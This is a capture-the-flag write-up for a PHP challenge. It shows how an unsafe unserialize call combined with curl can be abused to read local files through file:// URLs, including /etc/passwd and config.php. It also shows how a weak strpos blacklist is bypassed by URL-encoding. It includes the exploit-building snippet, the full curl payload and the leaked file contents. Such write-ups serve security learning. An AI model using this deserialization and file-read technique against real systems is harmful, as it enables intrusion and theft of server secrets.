# Vice

When we open the challenge web page, we get the following PHP code:
```php
<?php
//require_once 'config.php';

class SHITS{
  private $url;
  private $method;
  private $addr;
  private $host;
  private $name;

  function __construct($method,$url){
    $this->method = $method;
    $this->url = $url;
  }

  function doit(){
    
    $this->host = @parse_url($this->url)['host'];
    $this->addr = @gethostbyname($this->host);
    $this->name = @gethostbyaddr($this->host);
    if($this->addr !== "127.0.0.1" || $this->name === false){
      $not = ['.txt','.php','.xml','.html','.','[',']'];
      foreach($not as $ext){
        $p = strpos($this->url,$ext);
        if($p){
          die(":)");
        }
      }
      $ch = curl_init();
      curl_setopt($ch,CURLOPT_URL,$this->url);
      curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);

      $result = curl_exec($ch);
      echo $result;
    }else{
      die(":)");
    }
  }
  function __destruct(){
    if(in_array($this->method,array("doit"))){
 
      call_user_func_array(array($this,$this->method),array());
    }else{
      die(":)");
    }
  }
}
if(isset($_GET["gg"])) {
    @unserialize($_GET["gg"]);
} else {
    highlight_file(__FILE__);
}
```
We can send serialized PHP object in `gg` parameter and it will be unserialized. We will be sending serialized `SHITS` object. It has 5 private properties, but only 2 of them matter (other properties will be overwritten during code execution): `url` and `method`. `method` is the method from `SHITS` class to be executed - it has to be `doit`. `url` is the address of the resource to be downloaded (by `curl_exec`) and displayed. Note the we can also pass `file://` URLs, so in fact we can fetch any file from the web server's filesystem (e.g. `method = doit` and `url = file:///etc/passwd`).

The flag might be in `config.php` (see commented out `//require_once 'config.php';` at the very beginning of the PHP file), but `.php` is blacklisted in URL:
```php
$not = ['.txt','.php','.xml','.html','.','[',']'];
foreach($not as $ext){
    $p = strpos($this->url,$ext);
    if($p){
        die(":)");
    }
}
```
We can, however, bypass it very easily - just URL encode the `.php` suffix. I used the following code to serialize `SHITS` object with provided values and print the final exploit:
```php
$shits=new SHITS($argv[1], $argv[2]);
$ser=urlencode(serialize($shits));
echo 'curl http://68.183.31.62:991/?gg='.$ser."\n";
```
Then I executed the following to retrieve `/var/www/html/config.php` file:
```
$ php -f SHITS.php doit file:///var/www/html/config%2e%70%68%70
curl http://68.183.31.62:991/?gg=O%3A5%3A%22SHITS%22%3A5%3A%7Bs%3A10%3A%22%00SHITS%00url%22%3Bs%3A39%3A%22file%3A%2F%2F%2Fvar%2Fwww%2Fhtml%2Fconfig%252e%2570%2568%2570%22%3Bs%3A13%3A%22%00SHITS%00method%22%3Bs%3A4%3A%22doit%22%3Bs%3A11%3A%22%00SHITS%00addr%22%3BN%3Bs%3A11%3A%22%00SHITS%00host%22%3BN%3Bs%3A11%3A%22%00SHITS%00name%22%3BN%3B%7D
$ curl http://68.183.31.62:991/?gg=O%3A5%3A%22SHITS%22%3A5%3A%7Bs%3A10%3A%22%00SHITS%00url%22%3Bs%3A39%3A%22file%3A%2F%2F%2Fvar%2Fwww%2Fhtml%2Fconfig%252e%2570%2568%2570%22%3Bs%3A13%3A%22%00SHITS%00method%22%3Bs%3A4%3A%22doit%22%3Bs%3A11%3A%22%00SHITS%00addr%22%3BN%3Bs%3A11%3A%22%00SHITS%00host%22%3BN%3Bs%3A11%3A%22%00SHITS%00name%22%3BN%3B%7D 
<?php
if($_SERVER['REMOTE_ADDR'] !== '::1' || $_SERVER['REMOTE_ADDR'] !== '127.0.0.1'){
echo "aaawn";
}else{
$flag ="F#{wtf_5trp0s_}";
}
```
The flag is `F#{wtf_5trp0s_}`.